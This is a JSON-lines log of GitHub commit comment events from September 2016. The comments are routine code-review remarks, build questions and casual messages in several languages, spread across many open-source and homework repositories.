{"id":"4519854367","type":"CommitCommentEvent","actor":{"login":"salvesrua"},"repo":{"name":"Guiroc/projet_GED"},"payload":{"comment":{"id":18907192,"position":null,"line":null,"path":null,"commit_id":"02d3d05be1b27f0aa72f265d1b0f75437978da30","created_at":"2016-09-06T08:15:21Z","updated_at":"2016-09-06T08:15:21Z","body":"GUILLAUME LE THUG"}},"created_at":"2016-09-06T08:15:21Z"}
{"id":"4519860808","type":"CommitCommentEvent","actor":{"login":"yasuda-yuka"},"repo":{"name":"yasuda-yuka/ToDoList"},"payload":{"comment":{"id":18907201,"position":null,"line":null,"path":null,"commit_id":"4265e1f87152545d4f689a558bb3de75a3c1f263","created_at":"2016-09-06T08:16:53Z","updated_at":"2016-09-06T08:16:53Z","body":"課題提出終了です。遅れてすいません。\r\nHerokuアドレス : https://aqueous-bayou-88353.herokuapp.com/tasks"}},"created_at":"2016-09-06T08:16:53Z"}
{"id":"4519861518","type":"CommitCommentEvent","actor":{"login":"leplatrem"},"repo":{"name":"Kinto/kinto"},"payload":{"comment":{"id":18907205,"position":7,"line":17,"path":"docs/api/index.rst","commit_id":"d08523c0ea0b9ee054a042b30285062369e45d42","created_at":"2016-09-06T08:17:03Z","updated_at":"2016-09-06T08:17:03Z","body":"I think *full-text* refers to something else, no?"}},"created_at":"2016-09-06T08:17:03Z"}
{"id":"4519864102","type":"CommitCommentEvent","actor":{"login":"leplatrem"},"repo":{"name":"Kinto/kinto"},"payload":{"comment":{"id":18907210,"position":5,"line":16,"path":"kinto/__init__.py","commit_id":"d08523c0ea0b9ee054a042b30285062369e45d42","created_at":"2016-09-06T08:17:36Z","updated_at":"2016-09-06T08:17:36Z","body":"We usually mention it in the changelog too "}},"created_at":"2016-09-06T08:17:36Z"}
{"id":"4519866632","type":"CommitCommentEvent","actor":{"login":"dinosaadeh"},"repo":{"name":"dinosaadeh/Barjis"},"payload":{"comment":{"id":18907217,"position":71,"line":116,"path":"core/src/com/smb215team/barjis/game/objects/Pawn.java","commit_id":"08716faae207e923350e6234b8c5a8f45520aea2","created_at":"2016-09-06T08:18:12Z","updated_at":"2016-09-06T08:18:12Z","body":"check the comment on Github.. I put it right next to the calculation.\n"}},"created_at":"2016-09-06T08:18:12Z"}
{"id":"4519869629","type":"CommitCommentEvent","actor":{"login":"briets"},"repo":{"name":"briets/laroute"},"payload":{"comment":{"id":18907223,"position":null,"line":null,"path":null,"commit_id":"f273c900a4d31c3f08f7cce234c4ea94cfc2b5d1","created_at":"2016-09-06T08:18:53Z","updated_at":"2016-09-06T08:18:53Z","body":"Parameters for url are already checked on the ported method and should be [] if not given"}},"created_at":"2016-09-06T08:18:53Z"}
{"id":"4519873815","type":"CommitCommentEvent","actor":{"login":"abc612008"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18907230,"position":null,"line":null,"path":null,"commit_id":"e41bed97df41172bdfeeae82c92f13944cda3e1b","created_at":"2016-09-06T08:19:51Z","updated_at":"2016-09-06T08:19:51Z","body":"@Miigon 你先弄吧"}},"created_at":"2016-09-06T08:19:51Z"}
{"id":"4519874635","type":"CommitCommentEvent","actor":{"login":"c-schmitz"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18907233,"position":5,"line":691,"path":"application/helpers/replacements_helper.php","commit_id":"b1c10d5d9f5f4f0e482c071bce787aee3864bdad","created_at":"2016-09-06T08:20:02Z","updated_at":"2016-09-06T08:20:02Z","body":"@olleharstedt  Please move the <noscript> tag into the template tag - thank you."}},"created_at":"2016-09-06T08:20:02Z"}
{"id":"4519874881","type":"CommitCommentEvent","actor":{"login":"abc612008"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18907235,"position":18,"line":52,"path":"src/server/server.h","commit_id":"8de0766bfcbcab5862b4d32bdf245275169bc0aa","created_at":"2016-09-06T08:20:06Z","updated_at":"2016-09-06T08:20:06Z","body":"@Miigon 啥时候不用asio了……"}},"created_at":"2016-09-06T08:20:06Z"}
{"id":"4519877814","type":"CommitCommentEvent","actor":{"login":"cadaver"},"repo":{"name":"urho3d/Urho3D"},"payload":{"comment":{"id":18907246,"position":null,"line":null,"path":null,"commit_id":"48f779e234b4cf6f2429e1456935412731950ef8","created_at":"2016-09-06T08:20:42Z","updated_at":"2016-09-06T08:20:42Z","body":"Yes, will have to be removed. I'll actually remove the AlphaMask techniques, as well as PackedNormal."}},"created_at":"2016-09-06T08:20:42Z"}
{"id":"4519880522","type":"CommitCommentEvent","actor":{"login":"koppor"},"repo":{"name":"bartsch-dev/jabref"},"payload":{"comment":{"id":18907251,"position":16,"line":126,"path":"build.gradle","commit_id":"42ec1ef58d639c4c9ceef5b5c129f92238613373","created_at":"2016-09-06T08:21:18Z","updated_at":"2016-09-06T08:21:18Z","body":"Is `SNAPSHOT` really necessary? Please comment or use stable version."}},"created_at":"2016-09-06T08:21:18Z"}
{"id":"4519881498","type":"CommitCommentEvent","actor":{"login":"ckamm"},"repo":{"name":"owncloud/client"},"payload":{"comment":{"id":18907255,"position":20,"line":63,"path":"src/gui/folderwatcher.cpp","commit_id":"b9f6e84d569e2bbbc787082c48b9cb652daf99e4","created_at":"2016-09-06T08:21:30Z","updated_at":"2016-09-06T08:21:30Z","body":"I think the issue here is about symlinks, possibly also junctions and other reparse points. What if the folder watcher gives us a path that's outside of the folder it was set up for? We usually *do* want that to trigger a sync (because we assume the OS knows what it's doing). With this code, the exclude logic would be checked for an incorrect path. (\"/path/to/folder\" + \"/tmp/my/symliked/contents\")"}},"created_at":"2016-09-06T08:21:30Z"}
{"id":"4519883645","type":"CommitCommentEvent","actor":{"login":"abc612008"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18907260,"position":null,"line":null,"path":null,"commit_id":"2007a875507cc89d9f44e79cc6570af9d991c935","created_at":"2016-09-06T08:22:00Z","updated_at":"2016-09-06T08:22:00Z","body":"所以为啥非得要改名字"}},"created_at":"2016-09-06T08:22:00Z"}
{"id":"4519886628","type":"CommitCommentEvent","actor":{"login":"mcorb"},"repo":{"name":"hanwen/go-fuse"},"payload":{"comment":{"id":18907269,"position":12,"line":152,"path":"fuse/types_darwin.go","commit_id":"fcb5b5b5c49286fb33e674534c18195d84abe8ef","created_at":"2016-09-06T08:22:38Z","updated_at":"2016-09-06T08:22:38Z","body":"This doesn't currently build on OS X, and not sure the comments are accurate.\r\n\r\nThe docs suggest preferred and fundamental block sizes map more like this:\r\n\r\n        s.Bsize = uint32(statfs.Bsize)\r\n        s.Frsize = uint32(statfs.Iosize)\r\n"}},"created_at":"2016-09-06T08:22:38Z"}
{"id":"4519888571","type":"CommitCommentEvent","actor":{"login":"1vanK"},"repo":{"name":"urho3d/Urho3D"},"payload":{"comment":{"id":18907274,"position":null,"line":null,"path":null,"commit_id":"48f779e234b4cf6f2429e1456935412731950ef8","created_at":"2016-09-06T08:23:03Z","updated_at":"2016-09-06T08:23:03Z","body":"I think also need some example material with alphamask and rederorder"}},"created_at":"2016-09-06T08:23:03Z"}
{"id":"4519891513","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"lamozg6/homework11"},"payload":{"comment":{"id":18907281,"position":9,"line":9,"path":"src/bin/User.java","commit_id":"b69c50143097b471bad613fb8ede5b8163e1ade9","created_at":"2016-09-06T08:23:42Z","updated_at":"2016-09-06T08:23:42Z","body":"`private ArrayList<PhoneNumber> phoneNumbers; -> private List<PhoneNumber> phoneNumbers;`\r\nTry use parent types "}},"created_at":"2016-09-06T08:23:42Z"}
{"id":"4519893741","type":"CommitCommentEvent","actor":{"login":"aberdean"},"repo":{"name":"aberdean/aberdean.github.io"},"payload":{"comment":{"id":18907286,"position":null,"line":null,"path":null,"commit_id":"90747b86fae10398a5fef2661b58e95f765b4a4e","created_at":"2016-09-06T08:24:11Z","updated_at":"2016-09-06T08:24:11Z","body":"Commit message should have been \"Fixed another typo.\""}},"created_at":"2016-09-06T08:24:11Z"}
{"id":"4519895015","type":"CommitCommentEvent","actor":{"login":"midwan"},"repo":{"name":"Chips-fr/uae4arm-rpi"},"payload":{"comment":{"id":18907289,"position":null,"line":null,"path":null,"commit_id":"68a20a1be689c5beb01ac6d00010233be616ff58","created_at":"2016-09-06T08:24:28Z","updated_at":"2016-09-06T08:24:28Z","body":"From what I've checked, the -DSIX_AXIS_WORKAROUND is not really referenced anywhere in the code. Why do you have it in the Makefile?"}},"created_at":"2016-09-06T08:24:28Z"}
{"id":"4519897610","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"lamozg6/homework11"},"payload":{"comment":{"id":18907295,"position":59,"line":59,"path":"src/bin/User.java","commit_id":"b69c50143097b471bad613fb8ede5b8163e1ade9","created_at":"2016-09-06T08:25:03Z","updated_at":"2016-09-06T08:25:03Z","body":"showPhoneNumbers method should be in controller not in user bean."}},"created_at":"2016-09-06T08:25:03Z"}
{"id":"4519897818","type":"CommitCommentEvent","actor":{"login":"Mr-MEX"},"repo":{"name":"airend/proprietary_vendor_lge_hammerhead"},"payload":{"comment":{"id":18907297,"position":null,"line":null,"path":null,"commit_id":"3f3f48ba36337d9495b1f666983ff463d19ee4ad","created_at":"2016-09-06T08:25:06Z","updated_at":"2016-09-06T08:25:06Z","body":"It helped to get rid of spam?\r\n09-05 12:35:10.758  2618  2647 E QcrilMsgTunnelSocket: Hit EOS reading message length\r\n09-05 12:35:10.758  2618  2647 I QcrilMsgTunnelSocket: Disconnected from 'qmux_radio/rild_oem0' socket\r\n09-05 12:35:10.758  2618  2647 I QcrilMsgTunnelSocket: Connected to 'qmux_radio/rild_oem0' socket"}},"created_at":"2016-09-06T08:25:06Z"}
{"id":"4519905994","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"lamozg6/homework11"},"payload":{"comment":{"id":18907316,"position":73,"line":73,"path":"src/controller/Controller.java","commit_id":"b69c50143097b471bad613fb8ede5b8163e1ade9","created_at":"2016-09-06T08:26:52Z","updated_at":"2016-09-06T08:26:52Z","body":"generateUserID, generatePhoneID, generateID methods should be in util class"}},"created_at":"2016-09-06T08:26:52Z"}
{"id":"4519909331","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18907327,"position":5,"line":691,"path":"application/helpers/replacements_helper.php","commit_id":"b1c10d5d9f5f4f0e482c071bce787aee3864bdad","created_at":"2016-09-06T08:27:36Z","updated_at":"2016-09-06T08:27:36Z","body":"oh right, I didn't noticed he did it in replacement helpers...\r\n"}},"created_at":"2016-09-06T08:27:36Z"}
{"id":"4519911590","type":"CommitCommentEvent","actor":{"login":"KonstantinDavidov"},"repo":{"name":"xbadcode/Rubezh"},"payload":{"comment":{"id":18907332,"position":22,"line":553,"path":"Projects/FireMonitor/Modules/SKDModule/Employees/ViewModels/EmployeeDetails/EmployeeDetailsViewModel.cs","commit_id":"bbaa7aadbe651e4ae232ea01afe8cd92e5857531","created_at":"2016-09-06T08:28:05Z","updated_at":"2016-09-06T08:28:05Z","body":"Почему не получится? У тебя код внутри if() будет выполняться только если **departmentSelectionViewModel.SelectedDepartment != null**. А, присваивание **SelectedDepartment** можно вынести за if(), ведь оно у тебя будет выполняться в любом случае."}},"created_at":"2016-09-06T08:28:05Z"}
{"id":"4519916494","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"lamozg6/homework11"},"payload":{"comment":{"id":18907351,"position":19,"line":19,"path":"src/userrepository/UserRepository.java","commit_id":"b69c50143097b471bad613fb8ede5b8163e1ade9","created_at":"2016-09-06T08:29:09Z","updated_at":"2016-09-06T08:29:09Z","body":"showTelNumbers and showFriendList methods shouldn't be in repository layer.\r\n"}},"created_at":"2016-09-06T08:29:09Z"}
{"id":"4519917850","type":"CommitCommentEvent","actor":{"login":"cadaver"},"repo":{"name":"urho3d/Urho3D"},"payload":{"comment":{"id":18907358,"position":null,"line":null,"path":null,"commit_id":"48f779e234b4cf6f2429e1456935412731950ef8","created_at":"2016-09-06T08:29:25Z","updated_at":"2016-09-06T08:29:25Z","body":"There isn't one currently, feel free to make one. PACKEDNORMAL material define will be demonstrated for the stone normal."}},"created_at":"2016-09-06T08:29:25Z"}
{"id":"4519918970","type":"CommitCommentEvent","actor":{"login":"ckamm"},"repo":{"name":"owncloud/client"},"payload":{"comment":{"id":18907362,"position":45,"line":593,"path":"src/libsync/propagatedownload.cpp","commit_id":"2662203fb7277d5d1a57cef556279f8cd3b974f5","created_at":"2016-09-06T08:29:39Z","updated_at":"2016-09-06T08:29:39Z","body":"This was an unintentional behavior change. It changed the behavior from \"delete rpath, copy fpath to rpath\" to \"move fpath to rpath\". Will fix."}},"created_at":"2016-09-06T08:29:39Z"}
{"id":"4519920050","type":"CommitCommentEvent","actor":{"login":"rahul-raturi"},"repo":{"name":"sagarkarira/glubot"},"payload":{"comment":{"id":18907366,"position":null,"line":null,"path":null,"commit_id":"1e34111e9583c23f5786e4601a6fc9a01beeb4f7","created_at":"2016-09-06T08:29:54Z","updated_at":"2016-09-06T08:29:54Z","body":"`nicks.json` is required [here](https://github.com/sagarkarira/glubot/blob/master/greetings.js#L8), leading to exception."}},"created_at":"2016-09-06T08:29:54Z"}
{"id":"4519921739","type":"CommitCommentEvent","actor":{"login":"dogsky"},"repo":{"name":"dogsky/test"},"payload":{"comment":{"id":18907370,"position":null,"line":null,"path":null,"commit_id":"44b733e6b7d0b4485166de42a518f4cee4ccd89d","created_at":"2016-09-06T08:30:18Z","updated_at":"2016-09-06T08:30:18Z","body":"这是测试drone的程序"}},"created_at":"2016-09-06T08:30:18Z"}
{"id":"4519922757","type":"CommitCommentEvent","actor":{"login":"zxy49"},"repo":{"name":"zxy49/new-term"},"payload":{"comment":{"id":18907373,"position":null,"line":null,"path":null,"commit_id":"3a5a4c056fd82285e5d750310ebc4a2e4053564d","created_at":"2016-09-06T08:30:30Z","updated_at":"2016-09-06T08:30:30Z","body":"ok\r\n"}},"created_at":"2016-09-06T08:30:30Z"}
{"id":"4519922916","type":"CommitCommentEvent","actor":{"login":"BluesSky"},"repo":{"name":"BluesSky/MyTest.io"},"payload":{"comment":{"id":18907375,"position":null,"line":null,"path":null,"commit_id":"a0f7060dbab7307d4f939f6060013c9919269b5f","created_at":"2016-09-06T08:30:33Z","updated_at":"2016-09-06T08:30:33Z","body":"First ,find something.Then choose onething everything interested in .Go and achieve it."}},"created_at":"2016-09-06T08:30:33Z"}
{"id":"4519926261","type":"CommitCommentEvent","actor":{"login":"everlutions"},"repo":{"name":"everlutions/AndroidFlow"},"payload":{"comment":{"id":18907384,"position":null,"line":null,"path":null,"commit_id":"073eb32ea90650c0099122e3f11d19c36c317016","created_at":"2016-09-06T08:31:17Z","updated_at":"2016-09-06T08:31:17Z","body":"test input file replaced by variable name of input file"}},"created_at":"2016-09-06T08:31:17Z"}
{"id":"4519926304","type":"CommitCommentEvent","actor":{"login":"laoono"},"repo":{"name":"mipengine/mip-plugins"},"payload":{"comment":{"id":18907385,"position":6,"line":5,"path":"extensions/mip-fh-ad/README.md","commit_id":"6ebb104510aaa9df7289350676032afddebf772a","created_at":"2016-09-06T08:31:18Z","updated_at":"2016-09-06T08:31:18Z","body":"描述请更正：展示页面直投广告"}},"created_at":"2016-09-06T08:31:18Z"}
{"id":"4519930095","type":"CommitCommentEvent","actor":{"login":"KonstantinDavidov"},"repo":{"name":"xbadcode/Rubezh"},"payload":{"comment":{"id":18907396,"position":3,"line":49,"path":"Projects/FireMonitor/Modules/SKDModule/Departments/ViewModels/DepartmentDetailsViewModel.cs","commit_id":"6373e14c083c7b983f47b2f823f4f51d1d58ee62","created_at":"2016-09-06T08:32:08Z","updated_at":"2016-09-06T08:32:08Z","body":"Немного не понятно, почему ты не хочешь инициализцаию команд проводить в конструкторе класса.\r\nЭту команду тоже заодно лучше захватить в метод инициализации команд, чтоб она тоже работала во всех случаях."}},"created_at":"2016-09-06T08:32:08Z"}
{"id":"4519933088","type":"CommitCommentEvent","actor":{"login":"peabee"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18907405,"position":null,"line":null,"path":null,"commit_id":"14f679d128af4e3167b1a5a5fa895144b0bc1210","created_at":"2016-09-06T08:32:46Z","updated_at":"2016-09-06T08:32:46Z","body":"I don't see support/rootfs-packages.conf-backup - does it need to be added?"}},"created_at":"2016-09-06T08:32:46Z"}
{"id":"4519940680","type":"CommitCommentEvent","actor":{"login":"andrii142"},"repo":{"name":"andrii142/JavaCourse"},"payload":{"comment":{"id":18907427,"position":28,"line":27,"path":"src/module4/homework/BankSystemImpl.java","commit_id":"7ea887d3ab3658297aa459a0519c9b3d96d2927c","created_at":"2016-09-06T08:34:25Z","updated_at":"2016-09-06T08:34:25Z","body":"изменил\r\nто был старый вариан"}},"created_at":"2016-09-06T08:34:25Z"}
{"id":"4519957758","type":"CommitCommentEvent","actor":{"login":"1vanK"},"repo":{"name":"urho3d/Urho3D"},"payload":{"comment":{"id":18907472,"position":null,"line":null,"path":null,"commit_id":"48f779e234b4cf6f2429e1456935412731950ef8","created_at":"2016-09-06T08:38:01Z","updated_at":"2016-09-06T08:38:01Z","body":"We already have the materials that are not used in the examples. So we can just add another (and use for it Textures/UrhoDecalAlpha.dds texture)\r\n"}},"created_at":"2016-09-06T08:38:01Z"}
{"id":"4519958064","type":"CommitCommentEvent","actor":{"login":"Demon404"},"repo":{"name":"Demon404/react-native-navtab"},"payload":{"comment":{"id":18907473,"position":2,"line":2,"path":"README.md","commit_id":"c67d77577b49a04ccb5996ee9ada6017b5aea312","created_at":"2016-09-06T08:38:06Z","updated_at":"2016-09-06T08:38:06Z","body":"npm install"}},"created_at":"2016-09-06T08:38:06Z"}
{"id":"4519962340","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"LilitHayrapetyan/AcaHomeworkAddressBook"},"payload":{"comment":{"id":18907485,"position":7,"line":7,"path":"src/addressbook/IUserRepository.java","commit_id":"fbb798889d5ec3ffad6bbeaea8dfff25ec0b458d","created_at":"2016-09-06T08:39:01Z","updated_at":"2016-09-06T08:39:01Z","body":"void deleteUser(int userId) throws InvalidArgumentException;\r\nUser addUser(User user) throws InvalidArgumentException;\r\nPhoneAddress addPhoneAddressInFile(PhoneAddress phoneAddress) throws InvalidArgumentException;\r\nList<PhoneAddress> getPhoneAddresses(String userName) throws InvalidArgumentException;\r\nUser getUser(String userName) throws InvalidArgumentException;\r\nvoid addFriend(int userId, int fuserId)  throws InvalidArgumentException;\r\nUser editUser(User user)  throws InvalidArgumentException;"}},"created_at":"2016-09-06T08:39:01Z"}
{"id":"4519966676","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"LilitHayrapetyan/AcaHomeworkAddressBook"},"payload":{"comment":{"id":18907494,"position":14,"line":14,"path":"src/addressbook/IUserRepository.java","commit_id":"fbb798889d5ec3ffad6bbeaea8dfff25ec0b458d","created_at":"2016-09-06T08:39:54Z","updated_at":"2016-09-06T08:39:54Z","body":"boolean userListContainUserOrNot(List<User> userList, User usr); -> this is util method. it's shouldn't be here. "}},"created_at":"2016-09-06T08:39:54Z"}
{"id":"4519967179","type":"CommitCommentEvent","actor":{"login":"jkaberg"},"repo":{"name":"havardgulldahl/jottalib"},"payload":{"comment":{"id":18907495,"position":null,"line":null,"path":null,"commit_id":"a02c6ee173df09cb0ddc05e65360f0950b723756","created_at":"2016-09-06T08:40:00Z","updated_at":"2016-09-06T08:40:00Z","body":"I was running the newest 0.7~ at that time, but I see now that 0.6 errors out on this update."}},"created_at":"2016-09-06T08:40:00Z"}
{"id":"4519969242","type":"CommitCommentEvent","actor":{"login":"liskin"},"repo":{"name":"William-Yeh/ansible-sudo-agent-forwarding"},"payload":{"comment":{"id":18907499,"position":5,"line":3,"path":"tasks/main.yml","commit_id":"68beacf1f54c46bf2df09ab20bb9cd2121194405","created_at":"2016-09-06T08:40:24Z","updated_at":"2016-09-06T08:40:24Z","body":"Is update_cache=yes really necessary? It slows down my playbooks unnecessarily. :-("}},"created_at":"2016-09-06T08:40:24Z"}
{"id":"4519971362","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"LilitHayrapetyan/AcaHomeworkAddressBook"},"payload":{"comment":{"id":18907504,"position":9,"line":9,"path":"src/addressbook/PhoneType.java","commit_id":"fbb798889d5ec3ffad6bbeaea8dfff25ec0b458d","created_at":"2016-09-06T08:40:51Z","updated_at":"2016-09-06T08:40:51Z","body":"int phoneId; -> int phoneTypeId or int id;"}},"created_at":"2016-09-06T08:40:51Z"}
{"id":"4519972467","type":"CommitCommentEvent","actor":{"login":"ltratt"},"repo":{"name":"softdevteam/warmup_experiment"},"payload":{"comment":{"id":18907508,"position":5,"line":84,"path":"mark_outliers_in_json.py","commit_id":"021dea418bf85e9cd61463acb31370cd19ecb570","created_at":"2016-09-06T08:41:07Z","updated_at":"2016-09-06T08:41:07Z","body":"This is saying `if l_slice == 0 and (r_slice - 0) == r_slice` i.e. equivalent to `if l_slice == 0`. I think it should be `if l_slice == 0 and r_slice < window_size`."}},"created_at":"2016-09-06T08:41:07Z"}
{"id":"4519972722","type":"CommitCommentEvent","actor":{"login":"Poshwosh"},"repo":{"name":"cursey/kanan"},"payload":{"comment":{"id":18907509,"position":null,"line":null,"path":null,"commit_id":"7118b066fbfd5fc5beab8d39ecbaa0c4f5d7ae27","created_at":"2016-09-06T08:41:10Z","updated_at":"2016-09-06T08:41:10Z","body":"Running on Windows 7 x64 here\r\nI disabled nagle through regedit, restarted my computer then attempted to launch Kanan without DisableNagle.js and with it. I have recorded both attempts and they appear to be the same speed. :("}},"created_at":"2016-09-06T08:41:10Z"}
{"id":"4519974408","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"LilitHayrapetyan/AcaHomeworkAddressBook"},"payload":{"comment":{"id":18907514,"position":13,"line":13,"path":"src/addressbook/User.java","commit_id":"fbb798889d5ec3ffad6bbeaea8dfff25ec0b458d","created_at":"2016-09-06T08:41:31Z","updated_at":"2016-09-06T08:41:31Z","body":"You don't need keep PhoneAddress phoneAddress ;"}},"created_at":"2016-09-06T08:41:31Z"}
{"id":"4519977225","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"LilitHayrapetyan/AcaHomeworkAddressBook"},"payload":{"comment":{"id":18907522,"position":15,"line":15,"path":"src/addressbook/User.java","commit_id":"fbb798889d5ec3ffad6bbeaea8dfff25ec0b458d","created_at":"2016-09-06T08:42:10Z","updated_at":"2016-09-06T08:42:10Z","body":"your lists should be private \r\n\r\n`private List<PhoneAddress> phoneAddressList =new  ArrayList<PhoneAddress>();`\r\n"}},"created_at":"2016-09-06T08:42:10Z"}
{"id":"4519980509","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"LilitHayrapetyan/AcaHomeworkAddressBook"},"payload":{"comment":{"id":18907530,"position":66,"line":66,"path":"src/addressbook/User.java","commit_id":"fbb798889d5ec3ffad6bbeaea8dfff25ec0b458d","created_at":"2016-09-06T08:42:55Z","updated_at":"2016-09-06T08:42:55Z","body":"You don't need this \"`public void setPhoneAddressList(List<PhoneAddress> phoneAddressList)`\" method"}},"created_at":"2016-09-06T08:42:55Z"}
{"id":"4519985101","type":"CommitCommentEvent","actor":{"login":"davetoxa"},"repo":{"name":"akilbekov/flashcards"},"payload":{"comment":{"id":18907549,"position":21,"line":18,"path":"app/models/card.rb","commit_id":"b4e763e6f4523d825e6326498bebb699e8a449b1","created_at":"2016-09-06T08:43:53Z","updated_at":"2016-09-06T08:43:53Z","body":"Передавай только слово, а не все параметры "}},"created_at":"2016-09-06T08:43:53Z"}
{"id":"4519990352","type":"CommitCommentEvent","actor":{"login":"mducle"},"repo":{"name":"mantidproject/mantid"},"payload":{"comment":{"id":18907567,"position":null,"line":null,"path":null,"commit_id":"2eea9647af1cf80bd0172c3b41862b4b06b3e5ef","created_at":"2016-09-06T08:45:01Z","updated_at":"2016-09-06T08:45:01Z","body":"I think the first `if (isfinite(psi))` is not necessary - we can leave the value of `psi` (e.g. `NaN` in this case) in the logs so people know that it was not set. We just don't want it messing up the goniometer matrix automatically (if people use it to set the goniometer matrix, that's their problem!).\r\n\r\nHowever, I found that I needed to use `std::isfinite` instead of `isfinite` for it to compile, since the `std` namespace doesn't seem to have been imported."}},"created_at":"2016-09-06T08:45:01Z"}
{"id":"4519992127","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"LilitHayrapetyan/AcaHomeworkAddressBook"},"payload":{"comment":{"id":18907570,"position":15,"line":15,"path":"src/addressbook/UserRepository.java","commit_id":"fbb798889d5ec3ffad6bbeaea8dfff25ec0b458d","created_at":"2016-09-06T08:45:24Z","updated_at":"2016-09-06T08:45:24Z","body":"You shouldn't keep the following members to your repository class.\r\n+      String userName;\r\n+\tprivate String password;\r\n+\tList<PhoneAddress> phoneAddressList;\r\n+\tList<User> friends;\r\n+\t\r\n+\tUser user; // static or no\r\n+\tUser friendUser;\r\n+\tList<User> userList = new ArrayList();\r\n+      private User result;\r\n\r\n"}},"created_at":"2016-09-06T08:45:24Z"}
{"id":"4519993154","type":"CommitCommentEvent","actor":{"login":"Thomasoncc"},"repo":{"name":"changechenyu/MPAndroidChartTest"},"payload":{"comment":{"id":18907575,"position":null,"line":null,"path":null,"commit_id":"555d9ad0a1968987792be9411eb9db66f7065f84","created_at":"2016-09-06T08:45:38Z","updated_at":"2016-09-06T08:45:38Z","body":"打开提示Error:Plugin with id'com.android.application' not found 应该怎么改呀"}},"created_at":"2016-09-06T08:45:38Z"}
{"id":"4519996884","type":"CommitCommentEvent","actor":{"login":"davetoxa"},"repo":{"name":"akilbekov/flashcards"},"payload":{"comment":{"id":18907590,"position":16,"line":13,"path":"app/models/card.rb","commit_id":"b4e763e6f4523d825e6326498bebb699e8a449b1","created_at":"2016-09-06T08:46:30Z","updated_at":"2016-09-06T08:46:30Z","body":"Передавай только 1 параметр, original text, а не весь объект "}},"created_at":"2016-09-06T08:46:30Z"}
{"id":"4520002047","type":"CommitCommentEvent","actor":{"login":"drkutuzov"},"repo":{"name":"s123594/modellingProject"},"payload":{"comment":{"id":18907603,"position":32,"line":32,"path":"createMasksForFilteringData.py","commit_id":"61b85f1b114579c5fda1c85e84ad9de18dbc13ba","created_at":"2016-09-06T08:47:33Z","updated_at":"2016-09-06T08:47:33Z","body":"Here we want to cut the central part of each image (don't want the bright capillary).\r\nYou can do it in two different ways:\r\n1) using mask: \r\nmask = np.ones(data.shape, dtype=bool)\r\nmask[:, :, 200:300] = False\r\nresult = arr[mask]\r\n\r\n2) using delete:\r\nindex_to_remove = range(200, 300)\r\nresult = delete(data, index_to_remove, axis=2)\r\n\r\nNow you dont need to separately calculate left and right means"}},"created_at":"2016-09-06T08:47:33Z"}
{"id":"4520011085","type":"CommitCommentEvent","actor":{"login":"nashbridges"},"repo":{"name":"mamedov/heroic-sns"},"payload":{"comment":{"id":18907629,"position":5,"line":118,"path":"lib/heroic/sns/endpoint.rb","commit_id":"66c978612aaff842800ade633bf6c6eddc6f66d3","created_at":"2016-09-06T08:49:31Z","updated_at":"2016-09-06T08:49:31Z","body":"`open-uri` should [use env variables by default](https://github.com/ruby/ruby/blob/trunk/lib/open-uri.rb#L74), this is not needed since Ruby 2.x"}},"created_at":"2016-09-06T08:49:31Z"}
{"id":"4520017041","type":"CommitCommentEvent","actor":{"login":"DaividSmith"},"repo":{"name":"FICTURE7/CoCSharp"},"payload":{"comment":{"id":18907646,"position":null,"line":null,"path":null,"commit_id":"6e4e08bcf87d0edb4682606737f74f89a469da8c","created_at":"2016-09-06T08:50:49Z","updated_at":"2016-09-06T08:50:49Z","body":" FICTURE7 You Are Awesome\r\n\r\nplease keep it up bro"}},"created_at":"2016-09-06T08:50:49Z"}
{"id":"4520018541","type":"CommitCommentEvent","actor":{"login":"svx"},"repo":{"name":"testthedocs/ttd.training-docs-basics"},"payload":{"comment":{"id":18907648,"position":null,"line":null,"path":null,"commit_id":"7139b79b4c6dcd50019f82719537ef7c0872db3c","created_at":"2016-09-06T08:51:09Z","updated_at":"2016-09-06T08:51:09Z","body":"@polyester: \r\nCheck is no included into https://github.com/testthedocs/ttd.docs-builder\r\n with this commit:\r\nhttps://github.com/testthedocs/ttd.docs-builder/commit/e87d17b8560920d58d4826b8604efc027b9743f1\r\n\r\nSee the example:\r\n![docsbuilder_nit_picky_mode](https://cloud.githubusercontent.com/assets/358860/18267490/95770072-741f-11e6-8046-8fef11d79b54.png)\r\n"}},"created_at":"2016-09-06T08:51:09Z"}
{"id":"4520019431","type":"CommitCommentEvent","actor":{"login":"boxa"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18907650,"position":20,"line":1105,"path":"src/game/AI/CreatureEventAI.cpp","commit_id":"4e887248518c59ef5f418a6cc6fc9e880aee12b6","created_at":"2016-09-06T08:51:20Z","updated_at":"2016-09-06T08:51:20Z","body":"Creature 25106 using Event 2510607 (Type = 2) has RandomMax < RandomMin. Event repeating disabled.\r\nCreature 32238 using Event 3223805 (Type = 3) has RandomMax < RandomMin. Event repeating disabled.\r\nCreature 17713 using Event 1771310 (Type = 27) has RandomMax < RandomMin. Event repeating disabled.\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-06T08:51:20Z"}
